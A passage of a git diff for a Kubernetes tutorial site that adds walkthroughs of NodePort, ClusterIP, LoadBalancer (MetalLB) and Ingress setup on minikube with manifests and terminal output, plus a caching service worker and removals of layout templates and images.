+ +``` + +##### Accessing cluster-internal services + +- The ClusterIP services you created in the previous section are accessible only within the cluster, from other pods and from the cluster nodes.
+- use the kubectl exec command to run a command like curl in an existing pod and get it to connect to the service.
+ +To use the service from a pod, run a shell in the quote-001 + In my case, the quiz service uses cluster IP 10.99.118.40, whereas the quote service uses IP 10.98.242.63 + + +#### Access container outsusteride the clluster + +Now to access the container externally from the outside network we can use the public IP of individual worker node along with the NodePort + +curl https://: + +```sh +kubectl get pods -o wide + +``` +#### Creating a service through a YAML descriptor + +```sh +[root@controller ~]# cat 2048.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: "2048-deployment" +spec: + selector: + matchLabels: + app: "2048" + replicas: 5 + template: + metadata: + labels: + app: "2048" + spec: + containers: + - image: alexwhen/docker-2048 + imagePullPolicy: Always + name: "2048" + ports: + - containerPort: 80 + protocol: TCP +-- ##### Creating a NodePort service +apiVersion: v1 +kind: Service +metadata: + name: myservice + labels: + app: servicelabel +spec: + type: NodePort + ports: + - port: 80 + selector: + app: "2048" +``` + +```sh +kubectl create -f 2048.yml +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -o wide +NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES +2048-deployment-9ccbf58bd-57tng 1/1 Running 0 50s 172.17.0.12 minikube +2048-deployment-9ccbf58bd-78pnr 1/1 Running 0 50s 172.17.0.14 minikube +2048-deployment-9ccbf58bd-mbfrt 1/1 Running 0 50s 172.17.0.13 minikube +2048-deployment-9ccbf58bd-tfcnd 1/1 Running 0 50s 172.17.0.9 minikube +2048-deployment-9ccbf58bd-trxqw 1/1 Running 0 50s 172.17.0.11 minikube +kube-ops-view-5b596b7c7d-z2p2v 1/1 Running 0 7h37m 172.17.0.17 minikube +kube-ops-view-redis-6dc75f67cd-klhpf 1/1 Running 0 7h37m 172.17.0.16 minikube +lab-nginx-84756b7fc4-4qctt 1/1 Running 0 7h37m 172.17.0.19 minikube +lab-nginx-84756b7fc4-rhg4m 1/1 Running 0 7h37m 172.17.0.18 minikube +label-nginx-example-5f8bc677b9-6trt6 1/1 Running 0 7h37m 172.17.0.20 minikube +my-release-kubeview-f7447cf6c-2w85w 1/1 Running 0 7h37m 172.17.0.21 minikube +nginx-1-ff5997cdf-kpff9 1/1 Running 0 7h37m 172.17.0.7 minikube +nginx-lab-1-84756b7fc4-77kvz 1/1 Running 0 7h37m 172.17.0.8 minikube +nginx-lab-1-84756b7fc4-r9cmt 1/1 Running 0 7h37m 172.17.0.4 minikube +nginx-lab-1-84756b7fc4-sqbf4 1/1 Running 0 7h37m 172.17.0.10 minikube + +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get svc +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +kubernetes ClusterIP 10.96.0.1 443/TCP 31m +myservice NodePort 10.111.94.141 80:31487/TCP 2m55s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl describe service myservice +Name: myservice +Namespace: default +Labels: app=servicelabel +Annotations: +Selector: app=2048 +Type: NodePort +IP Family Policy: SingleStack +IP Families: IPv4 +IP: 10.111.94.141 +IPs: 10.111.94.141 +Port: 80/TCP +TargetPort: 80/TCP +NodePort: 31487/TCP +Endpoints: 172.17.0.11:80,172.17.0.12:80,172.17.0.13:80 + 2 more... +Session Affinity: None +External Traffic Policy: Cluster +Events: +➜ k8s101 git:(main) βœ— + +``` + +##### Accessing a NodePort service + +``` +➜ k8s101 git:(main) βœ— minikube service myservice +|-----------|-----------|-------------|---------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|-----------|-------------|---------------------------| +| default | myservice | 80 | http://192.168.49.2:31487 | +|-----------|-----------|-------------|---------------------------| +πŸƒ Starting tunnel for service myservice. +|-----------|-----------|-------------|------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|-----------|-------------|------------------------| +| default | myservice | | http://127.0.0.1:60323 | +|-----------|-----------|-------------|------------------------| +πŸŽ‰ Opening service default/myservice in default browser... +❗ Because you are using a Docker driver on darwin, the terminal needs to be open to run it. +``` + + + + diff --git a/content/en/k8s/c8.Service-Type 2.md b/content/en/k8s/c8.Service-Type 2.md new file mode 100644 index 0000000..dc6281b --- /dev/null +++ b/content/en/k8s/c8.Service-Type 2.md @@ -0,0 +1,395 @@ +--- +title: "Service Type - NodePort,ClusterIP,LoadBalancer " +description: " kubernetes Service " +slug: "Service-Type-NodePort,ClusterIP,LoadBalancer" +--- + +#### Service Type1: NodePort + +NodePort service helps expose the Service on each Node’s IP at a static port (the NodePort). NodePort The port is available to all the workers in the cluster. A ClusterIP Service, to which the NodePort Service routes are automatically created. One would be able to contact the NodePort Service, from outside the cluster, by requesting :. +The port on the POD is called the targetPort and the one connecting the NodePort service to the POD is called port. +All this means if any request coming into port 30080 to the cluster on any worker node will be forwarded to the β€œNode Port Service,” which in turn will forward the request to the underlying Pod at port 80. + + +Let’s start with creating a deployment using the YAML file below. Some key things to note, each container is using the port 80 and has a label called app:nginx + + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: my-nginx-deploy + labels: + app: nginx +spec: + replicas: 2 + selector: + matchLabels: + app: nginx + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: test-nginx + image: nginx:alpine + ports: + - containerPort: 80 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f my-nginx-deploy.yml +deployment.apps/my-nginx-deploy created +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +my-nginx-deploy-5c9989fcf4-pqpgj 1/1 Running 0 17s +my-nginx-deploy-5c9989fcf4-zkq8p 1/1 Running 0 17s +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-pqpgj | grep -i IP: | head -1 +IP: 172.17.0.22 + +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-zkq8p | grep -i IP: | head -1 +IP: 172.17.0.15 +``` + +```sh +kubectl get pods +NAME READY STATUS RESTARTS AGE +my-nginx-deploy-6b5d6b54bc-7pbmk 1/1 Running 0 7m47s +my-nginx-deploy-6b5d6b54bc-glhnt 1/1 Running 0 7m47s +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-pqpgj | grep -i IP: | head -1 +IP: 172.17.0.22 +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-zkq8p | grep -i IP: | head -1 +IP: 172.17.0.15 +➜ k8s101 git:(main) βœ— kubectl exec my-nginx-deploy-5c9989fcf4-pqpgj -it sh +kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead. +/ # apk add curl +fetch https://dl-cdn.alpinelinux.org/alpine/v3.17/main/aarch64/APKINDEX.tar.gz +fetch https://dl-cdn.alpinelinux.org/alpine/v3.17/community/aarch64/APKINDEX.tar.gz +OK: 43 MiB in 62 packages +/ # curl http://172.17.0.22:80 + + + +Welcome to nginx! + + + +

Welcome to nginx!

+

If you see this page, the nginx web server is successfully installed and +working. Further configuration is required.

+ +

For online documentation and support please refer to +nginx.org.
+Commercial support is available at +nginx.com.

+ +

Thank you for using nginx.

+ + +/ # exit +``` + +So how do we reach the PODs externally? +To reach the pods from outside the cluster, one needs to expose the port on the host machine to redirect the traffic to a port of the container. NodePort Service provides that capability. + +```yaml +apiVersion: v1 +kind: Service +metadata: + name: my-service +spec: + type: NodePort + selector: + app: nginx + ports: + # By default the `targetPort` is set to the same value as the `port` field. + - port: 80 + targetPort: 80 + # Optional field + # By default and for convenience, the Kubernetes control plane will allocate a port from a range (default: 30000-32767) + nodePort: 30007 +``` + +``` +kubectl apply -f nodeport.yml +service/my-service created +kubectl get svc +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +my-service NodePort 10.110.8.243 80:30007/TCP 12m +``` + + +NodePort service created has a virtual IP (10.110.8.243) assigned to it called ClusterIp, using which it can be accessed internally. To access the service, since we are using minikube, let’s see where the service is hosted for external usage. + +```sh + k8s101 git:(main) βœ— minikube service my-service +|-----------|------------|-------------|---------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|------------|-------------|---------------------------| +| default | my-service | 80 | http://192.168.49.2:30007 | +|-----------|------------|-------------|---------------------------| +πŸƒ Starting tunnel for service my-service. +|-----------|------------|-------------|------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|------------|-------------|------------------------| +| default | my-service | | http://127.0.0.1:61723 | +|-----------|------------|-------------|------------------------| +πŸŽ‰ Opening service default/my-service in default browser... + +``` + + +|`Feature`| `ClusterIP` | `NodePort` | `LoadBalancer`| +|:----|:---- |:------:| -----:| +|**Exposition**|Exposes the Service on an internal IP in the cluster.|Exposing services to external clients|Exposing services to external clients| +|**Cluster** |This type makes the Service only reachable from within the cluster|A NodePort service, each cluster node opens a port on the node itself (hence the name) and redirects traffic received on that port to the underlying service.|A LoadBalancer service accessible through a dedicated load balancer, provisioned from the cloud infrastructure Kubernetes is running on| +|**Accessibility**|It is **default** service and Internal clients send requests to a stable internal IP address.|The service is accessible at the internal cluster IP-port, and also through a dedicated port on all nodes.|Clients connect to the service through the load balancer’s IP.| +|**Yaml Config**|`type: ClusterIP `|`type: NodePort`|`type: LoadBalancer`| +|**Port Range**|Any public ip form Cluster|30000 - 32767|Any public ip form Cluster| +|**User Cases**| For internal communication |Best for testing public or private access or providing access for a small amount of time.| widely used For External communication| + + + +### ClusterIP + +ClusterIP is the default ServiceType and it creates a single IP address that can be used to access its Pods which can only be accessed from inside the cluster. If KubeDNS is enabled it will also get a series of DNS records assigned to it include an A record to match its IP. This is very useful for exposing microservices running inside the same Kubernetes cluster to each other. + +```sh +kubectl run hello --image=paulczar/hello-world +deployment "hello" created +``` + +```sh +kubectl expose deployment hello --port=8080 --type=ClusterIP +service "hello" exposed +$ kubectl run -i --tty --rm debug --image=alpine \ + --restart=Never -- wget -qO - hello:8080 +hello worldhello world! +$ kubectl delete service hello +service "hello" deleted +``` + +Since KubeDNS is enabled in minikube by default you can access the service via DNS using the name of the service. + +### NodePort + +NodePort builds on top of ClusterIP to create a mapping from each Worker Node’s static IP on a specified (or Kubernetes chosen) Port. A Service exposed as a NodePort can be accessed via :. This ServiceType can be useful when developing applications with minikube or for exposing a specific Port to an application via an unmanaged load balancer or round robin DNS. + +```sh +$ kubectl expose deployment hello --port=8080 --type=NodePort +service "hello" exposed +$ kubectl get service hello +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +hello NodePort 10.0.0.231 8080:30259/TCP 21s +$ minikube ip +192.168.99.100 +$ curl 192.168.99.100:30259 +hello worldhello world! +$ kubectl delete service hello +service "hello" deleted +``` + +### LoadBalancer + +LoadBalancer builds on top of NodePort and is used to automatically configure a supported external Load Balancer (for instance an ELB in Amazon) to route traffic through to the NodePort of the Service. This is the most versatile of the ServiceTypes but requires that you have a supported Load Balancer in your infrastructure of which most major cloud providers have. +In minikube this would produce the same result as a NodePort as minikube does not have a load balancer. However we can demonstrate it on Google Cloud quite easily if you have an account: + +```sh +$ kubectl run hello --image=paulczar/hello-world +deployment "hello" created +$ kubectl expose deployment hello --port=8080 --type=LoadBalancer +service "hello" exposed +$ kubectl get service +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +hello LoadBalancer 10.11.251.34 35.192.25.113 8080:32107/TCP 2m +$ curl 35.192.25.113:8080 +hello worldhello world! +``` + +```sh +➜ k8s101 git:(main) βœ— minikube addons list +|-----------------------------|----------|--------------|--------------------------------| +| ADDON NAME | PROFILE | STATUS | MAINTAINER | +|-----------------------------|----------|--------------|--------------------------------| +| ambassador | minikube | disabled | 3rd party (Ambassador) | +| auto-pause | minikube | disabled | Google | +| cloud-spanner | minikube | disabled | Google | +| csi-hostpath-driver | minikube | disabled | Kubernetes | +| dashboard | minikube | enabled βœ… | Kubernetes | +| default-storageclass | minikube | enabled βœ… | Kubernetes | +| efk | minikube | disabled | 3rd party (Elastic) | +| freshpod | minikube | disabled | Google | +| gcp-auth | minikube | disabled | Google | +| gvisor | minikube | disabled | Google | +| headlamp | minikube | disabled | 3rd party (kinvolk.io) | +| helm-tiller | minikube | disabled | 3rd party (Helm) | +| inaccel | minikube | disabled | 3rd party (InAccel | +| | | | [info@inaccel.com]) | +| ingress | minikube | disabled | Kubernetes | +| ingress-dns | minikube | disabled | Google | +| istio | minikube | disabled | 3rd party (Istio) | +| istio-provisioner | minikube | disabled | 3rd party (Istio) | +| kong | minikube | disabled | 3rd party (Kong HQ) | +| kubevirt | minikube | disabled | 3rd party (KubeVirt) | +| logviewer | minikube | disabled | 3rd party (unknown) | +| metallb | minikube | disabled | 3rd party (MetalLB) | +| metrics-server | minikube | enabled βœ… | Kubernetes | +| nvidia-driver-installer | minikube | disabled | Google | +| nvidia-gpu-device-plugin | minikube | disabled | 3rd party (Nvidia) | +| olm | minikube | disabled | 3rd party (Operator Framework) | +| pod-security-policy | minikube | disabled | 3rd party (unknown) | +| portainer | minikube | disabled | 3rd party (Portainer.io) | +| registry | minikube | disabled | Google | +| registry-aliases | minikube | disabled | 3rd party (unknown) | +| registry-creds | minikube | disabled | 3rd party (UPMC Enterprises) | +| storage-provisioner | minikube | enabled βœ… | Google | +| storage-provisioner-gluster | minikube | disabled | 3rd party (Gluster) | +| volumesnapshots | minikube | disabled | Kubernetes | +|-----------------------------|----------|--------------|--------------------------------| +πŸ’‘ To see addons list for other profiles use: `minikube addons -p name list` +➜ k8s101 git:(main) βœ— minikube addons enable metallb +❗ metallb is a 3rd party addon and is not maintained or verified by minikube maintainers, enable at your own risk. +❗ metallb does not currently have an associated maintainer. + β–ͺ Using image docker.io/metallb/speaker:v0.9.6 + β–ͺ Using image docker.io/metallb/controller:v0.9.6 +🌟 The 'metallb' addon is enabled +➜ k8s101 git:(main) βœ— +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get ns +NAME STATUS AGE +default Active 116d +kube-node-lease Active 116d +kube-public Active 116d +kube-system Active 116d +kubernetes-dashboard Active 46h +metallb-system Active 155m +➜ k8s101 git:(main) βœ— kubectl get all -n metallb-system +NAME READY STATUS RESTARTS AGE +pod/controller-55496b5cd7-p4k6g 1/1 Running 0 155m +pod/speaker-8l8kb 1/1 Running 0 155m + +NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE +daemonset.apps/speaker 1 1 1 1 1 beta.kubernetes.io/os=linux 155m + +NAME READY UP-TO-DATE AVAILABLE AGE +deployment.apps/controller 1/1 1 1 155m + +NAME DESIRED CURRENT READY AGE +replicaset.apps/controller-55496b5cd7 1 1 1 155m +``` + +``` +➜ k8s101 git:(main) βœ— minikube ip +192.168.49.2 +➜ k8s101 git:(main) βœ— minikube addons configure metallb +-- Enter Load Balancer Start IP: 192.168.49.100 +-- Enter Load Balancer End IP: 192.168.49.120 + β–ͺ Using image docker.io/metallb/controller:v0.9.6 + β–ͺ Using image docker.io/metallb/speaker:v0.9.6 +βœ… metallb was successfully configured +➜ k8s101 git:(main) βœ— +``` + +#### create ngnix deployment via Loadbalancer + + +```sh +apiVersion: v1 +kind: Service +metadata: + name: nginx-svc +spec: + selector: + app: nginx + ports: + - protocol: TCP + port: 80 + targetPort: 80 + type: LoadBalancer +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: nginx-deployment + labels: + app: nginx +spec: + replicas: 1 + selector: + matchLabels: + app: nginx + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: nginx + image: nginx:1.14.2 + ports: + - containerPort: 80 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f ngnix-metallb.yaml +service/nginx-svc created +deployment.apps/nginx-deployment created + +➜ k8s101 git:(main) βœ— kubectl get po,svc +NAME READY STATUS RESTARTS AGE +pod/2048-deployment-9ccbf58bd-57tng 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-78pnr 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-mbfrt 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-tfcnd 1/1 Running 0 6h18m +pod/2048-deployment-9ccbf58bd-trxqw 1/1 Running 0 6h18m +pod/kube-ops-view-5b596b7c7d-z2p2v 1/1 Running 0 13h +pod/kube-ops-view-redis-6dc75f67cd-klhpf 1/1 Running 0 13h +pod/lab-nginx-84756b7fc4-4qctt 1/1 Running 0 13h +pod/lab-nginx-84756b7fc4-rhg4m 1/1 Running 0 13h +pod/label-nginx-example-5f8bc677b9-6trt6 1/1 Running 0 13h +pod/my-nginx-deploy-5c9989fcf4-pqpgj 1/1 Running 0 4h23m +pod/my-nginx-deploy-5c9989fcf4-zkq8p 1/1 Running 0 4h23m +pod/my-release-kubeview-f7447cf6c-2w85w 1/1 Running 0 13h +pod/nginx-1-ff5997cdf-kpff9 1/1 Running 0 13h +pod/nginx-deployment-7fb96c846b-cm296 1/1 Running 0 80s +pod/nginx-lab-1-84756b7fc4-77kvz 1/1 Running 0 13h +pod/nginx-lab-1-84756b7fc4-r9cmt 1/1 Running 0 13h +pod/nginx-lab-1-84756b7fc4-sqbf4 1/1 Running 0 13h + +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +service/kubernetes ClusterIP 10.96.0.1 443/TCP 6h46m +service/my-service NodePort 10.103.55.123 80:30007/TCP 3h22m +service/myservice NodePort 10.111.94.141 80:31487/TCP 6h18m +service/nginx-svc LoadBalancer 10.104.216.130 192.168.49.100 80:31150/TCP 80s +➜ k8s101 git:(main) βœ— +``` +```sh +k8s101 git:(main) βœ— minikube tunnel +βœ… Tunnel successfully started + +πŸ“Œ NOTE: Please do not close this terminal as this process must stay alive for the tunnel to be accessible ... + +❗ The service/ingress nginx-svc requires privileged ports to be exposed: [80] +πŸ”‘ sudo permission will be asked for it. +πŸƒ Starting tunnel for service nginx-svc. +ΒΈ^Cβœ‹ Stopped tunnel for service nginx-svc. +``` + +#### open localhost on 80 port + +localhost:80 diff --git a/content/en/k8s/c9.Ingress-Controller 2.md b/content/en/k8s/c9.Ingress-Controller 2.md new file mode 100644 index 0000000..f575791 --- /dev/null +++ b/content/en/k8s/c9.Ingress-Controller 2.md @@ -0,0 +1,159 @@ +--- +title: "Ingress Controller" +description: " kubernetes Service " +slug: "Ingress-Controller" +--- + +#### enable ingress addon + +```sh +k8s101 git:(main) βœ— minikube addons enable ingress +πŸ’‘ ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image k8s.gcr.io/ingress-nginx/kube-webhook-certgen:v1.1.1 + β–ͺ Using image k8s.gcr.io/ingress-nginx/controller:v1.2.1 + β–ͺ Using image k8s.gcr.io/ingress-nginx/kube-webhook-certgen:v1.1.1 +πŸ”Ž Verifying ingress addon... +🌟 The 'ingress' addon is enabled +➜ k8s101 git:(main) βœ— +``` +#### verify ngnix controller running + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -n ingress-nginx +NAME READY STATUS RESTARTS AGE +ingress-nginx-admission-create-fxzbs 0/1 Completed 0 4m7s +ingress-nginx-admission-patch-jw98n 0/1 Completed 1 4m7s +ingress-nginx-controller-5959f988fd-tv8x8 1/1 Running 0 4m7s + +``` +#### verify all pods running + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -n kube-system +NAME READY STATUS RESTARTS AGE +coredns-565d847f94-bl9qz 1/1 Running 0 12h +etcd-minikube 1/1 Running 0 12h +kube-apiserver-minikube 1/1 Running 0 12h +kube-controller-manager-minikube 1/1 Running 0 12h +kube-proxy-qj7s7 1/1 Running 0 12h +kube-scheduler-minikube 1/1 Running 0 12h +storage-provisioner 1/1 Running 2 (12h ago) 12h + +``` + +#### Deploy Hello World App + +```sh + +➜ k8s101 git:(main) βœ— kubectl create deployment web --image=gcr.io/google-samples/hello-app:1.0 +deployment.apps/web created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl expose deployment web --type=NodePort --port=8080 +service/web exposed +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get service web +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +web NodePort 10.100.132.142 8080:30646/TCP 41s + +``` + +```sh +➜ k8s101 git:(main) βœ— minikube service web --url +http://127.0.0.1:51575 +❗ Because you are using a Docker driver on darwin, the terminal needs to be open to run it. +``` + +output +``` +Hello, world! +Version: 1.0.0 +Hostname: web-84fb9498c7-zx2k4 +``` + +### Ingress that sends traffic to your Service via hello-world.info. + +```yaml +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: example-ingress + annotations: + nginx.ingress.kubernetes.io/rewrite-target: /$1 +spec: + rules: + - host: hello-world.info + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: web + port: + number: 8080 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f example-ingress.yaml +ingress.networking.k8s.io/example-ingress created +``` + +#### verify IP addree + +```sh +➜ k8s101 git:(main) βœ— kubectl get ingress +NAME CLASS HOSTS ADDRESS PORTS AGE +example-ingress nginx hello-world.info 192.168.49.2 80 18m +➜ k8s101 git:(main) βœ— +``` + + +```sh +➜ k8s101 git:(main) βœ— echo "127.0.0.1 hello-world.info" | sudo tee -a /etc/hosts +127.0.0.1 hello-world.info +➜ k8s101 git:(main) βœ— kubectl apply -f example-ingress.yaml +ingress.networking.k8s.io/example-ingress unchanged +``` +#### add path + +```yaml + - path: /v2 + pathType: Prefix + backend: + service: + name: web2 + port: + number: 8080 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f example-ingress.yaml +ingress.networking.k8s.io/example-ingress configured +``` + +```sh +➜ k8s101 git:(main) βœ— minikube tunnel +βœ… Tunnel successfully started + +πŸ“Œ NOTE: Please do not close this terminal as this process must stay alive for the tunnel to be accessible ... + +❗ The service/ingress example-ingress requires privileged ports to be exposed: [80 443] +πŸ”‘ sudo permission will be asked for it. +πŸƒ Starting tunnel for service example-ingress. + +``` + +### check output + +```sh +http://hello-world.info/ +http://hello-world.info/v2 +``` \ No newline at end of file diff --git a/layouts/partials/blog/content.html b/layouts/partials/blog/content.html deleted file mode 100644 index 2972bbf..0000000 --- a/layouts/partials/blog/content.html +++ /dev/null @@ -1,14 +0,0 @@ -{{ $posts := where site.RegularPages "Section" "blog" }} -
-
-
-
-
-
- {{ .Content }} -
-
-
-
-
-
\ No newline at end of file diff --git a/layouts/partials/blog/cover.html b/layouts/partials/blog/cover.html deleted file mode 100644 index e69de29..0000000 diff --git a/layouts/partials/blog/hero.html b/layouts/partials/blog/hero.html deleted file mode 100644 index c564e64..0000000 --- a/layouts/partials/blog/hero.html +++ /dev/null @@ -1,19 +0,0 @@ -{{ $isPost := ne .File.BaseFileName "_index" }} -
-
-
-
-

- {{ .Title }} -

-
- - {{ if $isPost }} - {{ $date := dateFormat "January 2, 2006" .Date }} -

- {{ .Params.author }} | {{ $date }} -

- {{ end }} -
-
-
diff --git a/layouts/partials/blog/post-list.html b/layouts/partials/blog/post-list.html deleted file mode 100644 index 8ba62c9..0000000 --- a/layouts/partials/blog/post-list.html +++ /dev/null @@ -1,23 +0,0 @@ -{{ $posts := where site.RegularPages "Section" "blog" }} -
-
-
- {{ range $posts }} - {{ $date := dateFormat "January 2, 2006" .Date }} - - {{ end }} -
-
-
\ No newline at end of file diff --git a/public/sw 2.js b/public/sw 2.js new file mode 100644 index 0000000..e13c4c6 --- /dev/null +++ b/public/sw 2.js @@ -0,0 +1,61 @@ +const cacheName = 'docura-{{ now.Format "2006-01-02" }}'; +const staticAssets = [ + './', + './index.html', + './manifest.json', + './docs/**/*', + './font/*', + './img/icon/favicon.ico', + './img/icon/icon-16.png', + './img/icon/icon-32.png', + './img/icon/icon-180.png', + './img/icon/icon-192.png', + './img/icon/icon-512.png', + './img/icon/icon-vector.svg', + './img/icon/maskable-icon-192.png', + './img/icon/maskable-icon-512.png', + './js/base.min.js', + './js/component/docsearch.min.js', + './scss/base.css', + './scss/component/docsearch.css', + './scss/home.css', +]; + +self.addEventListener('install', async e => { + const cache = await caches.open(cacheName); + await cache.addAll(staticAssets); + return self.skipWaiting(); +}); + +self.addEventListener('activate', e => { + self.clients.claim(); +}); + +self.addEventListener('fetch', async e => { + const req = e.request; + const url = new URL(req.url); + + if (url.origin === location.origin) { + e.respondWith(cacheFirst(req)); + } else { + e.respondWith(networkFirst(req)); + } +}); + +async function cacheFirst(req) { + const cache = await caches.open(cacheName); + const cached = await cache.match(req); + return cached || fetch(req); +} + +async function networkFirst(req) { + const cache = await caches.open(cacheName); + try { + const fresh = await fetch(req); + cache.put(req, fresh.clone()); + return fresh; + } catch (e) { + const cached = await cache.match(req); + return cached; + } +} \ No newline at end of file diff --git a/static/img/icon/3.png b/static/img/icon/3.png deleted file mode 100644 index c0546dd..0000000 Binary files a/static/img/icon/3.png and /dev/null differ diff --git a/static/img/icon/Cloudnativefolks-Community-Logo-D7.png b/static/img/icon/Cloudnativefolks-Community-Logo-D7.png deleted file mode 100644 index b1cc5ab..0000000 Binary files a/static/img/icon/Cloudnativefolks-Community-Logo-D7.png and /dev/null differ diff --git a/static/img/icon/Linux Collective-2.png b/static/img/icon/Linux Collective-2.png deleted file mode 100644 index 0ce9256..0000000 Binary files a/static/img/icon/Linux Collective-2.png and /dev/null differ diff --git a/static/img/icon/Linux Collective.png b/static/img/icon/Linux Collective.png deleted file mode 100644 index 4686f82..0000000 Binary files a/static/img/icon/Linux Collective.png and /dev/null differ diff --git a/static/img/icon/button.png b/static/img/icon/button.png deleted file mode 100644 index 8fd958b..0000000 Binary files a/static/img/icon/button.png and /dev/null differ diff --git a/static/img/icon/favicon.ico b/static/img/icon/favicon.ico deleted file mode 100644 index 4f47bdc..0000000 Binary files a/static/img/icon/favicon.ico and /dev/null differ diff --git a/static/img/icon/icon-16.png b/static/img/icon/icon-16.png deleted file mode 100644 index c55011a..0000000 Binary files a/static/img/icon/icon-16.png and /dev/null differ diff --git a/static/img/icon/icon-180.png b/static/img/icon/icon-180.png deleted file mode 100644 index 694fd85..0000000 Binary files a/static/img/icon/icon-180.png and /dev/null differ diff --git a/static/img/icon/icon-192.png b/static/img/icon/icon-192.png deleted file mode 100644 index a47b1d8..0000000 Binary files a/static/img/icon/icon-192.png and /dev/null differ diff --git a/static/img/icon/icon-32.png b/static/img/icon/icon-32.png deleted file mode 100644 index afaee33..0000000 Binary files a/static/img/icon/icon-32.png and /dev/null differ diff --git a/static/img/icon/icon-512.png b/static/img/icon/icon-512.png deleted file mode 100644 index d69620b..0000000 Binary files a/static/img/icon/icon-512.png and /dev/null differ diff --git a/static/img/icon/icon-vector.svg b/static/img/icon/icon-vector.svg deleted file mode 100644 index fc8a34c..0000000 --- a/static/img/icon/icon-vector.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/static/img/icon/level-Layers-Abstraction.png b/static/img/icon/level-Layers-Abstraction.png deleted file mode 100644 index 7c18108..0000000 Binary files a/static/img/icon/level-Layers-Abstraction.png and /dev/null differ diff --git a/static/img/icon/linux-components.png b/static/img/icon/linux-components.png deleted file mode 100644 index 250a5c8..0000000 Binary files a/static/img/icon/linux-components.png and /dev/null differ diff --git a/static/img/icon/linux-subsystem.png b/static/img/icon/linux-subsystem.png deleted file mode 100644 index 0aabc18..0000000 Binary files a/static/img/icon/linux-subsystem.png and /dev/null differ diff --git a/static/img/icon/linux-subsytem.png b/static/img/icon/linux-subsytem.png deleted file mode 100644 index 0114619..0000000 Binary files a/static/img/icon/linux-subsytem.png and /dev/null differ diff --git a/static/img/icon/maskable-icon-192.png b/static/img/icon/maskable-icon-192.png deleted file mode 100644 index c9f099c..0000000 Binary files a/static/img/icon/maskable-icon-192.png and /dev/null differ diff --git a/static/img/icon/maskable-icon-512.png b/static/img/icon/maskable-icon-512.png deleted file mode 100644 index 281dae9..0000000 Binary files a/static/img/icon/maskable-icon-512.png and /dev/null differ diff --git a/static/img/icon/mono-micro-os.png b/static/img/icon/mono-micro-os.png deleted file mode 100644 index 20a2019..0000000 Binary files a/static/img/icon/mono-micro-os.png and /dev/null differ diff --git a/static/img/logos/3.png b/static/img/logos/3.png deleted file mode 100644 index ff0b3b4..0000000 Binary files a/static/img/logos/3.png and /dev/null differ diff --git a/static/img/logos/Cloudnativefolks-Community-Logo-D5.png b/static/img/logos/Cloudnativefolks-Community-Logo-D5.png deleted file mode 100644 index 592f59b..0000000 Binary files a/static/img/logos/Cloudnativefolks-Community-Logo-D5.png and /dev/null differ diff --git a/static/img/logos/Cloudnativefolks-Community-Logo-D7 2.png b/static/img/logos/Cloudnativefolks-Community-Logo-D7 2.png deleted file mode 100644 index b1cc5ab..0000000 Binary files a/static/img/logos/Cloudnativefolks-Community-Logo-D7 2.png and /dev/null differ diff --git a/static/img/logos/KubeDaily-3.png b/static/img/logos/KubeDaily-3.png deleted file mode 100755 index 1abdada..0000000 Binary files a/static/img/logos/KubeDaily-3.png and /dev/null differ diff --git a/static/img/logos/KubeDaily.jpg b/static/img/logos/KubeDaily.jpg deleted file mode 100755 index ef716e4..0000000 Binary files a/static/img/logos/KubeDaily.jpg and /dev/null differ diff --git a/static/img/logos/profile-pic-2.png b/static/img/logos/profile-pic-2.png deleted file mode 100644 index b8bc081..0000000 Binary files a/static/img/logos/profile-pic-2.png and /dev/null differ diff --git a/static/img/logos/profile-pic-3.png b/static/img/logos/profile-pic-3.png deleted file mode 100644 index e799fe8..0000000 Binary files a/static/img/logos/profile-pic-3.png and /dev/null differ diff --git 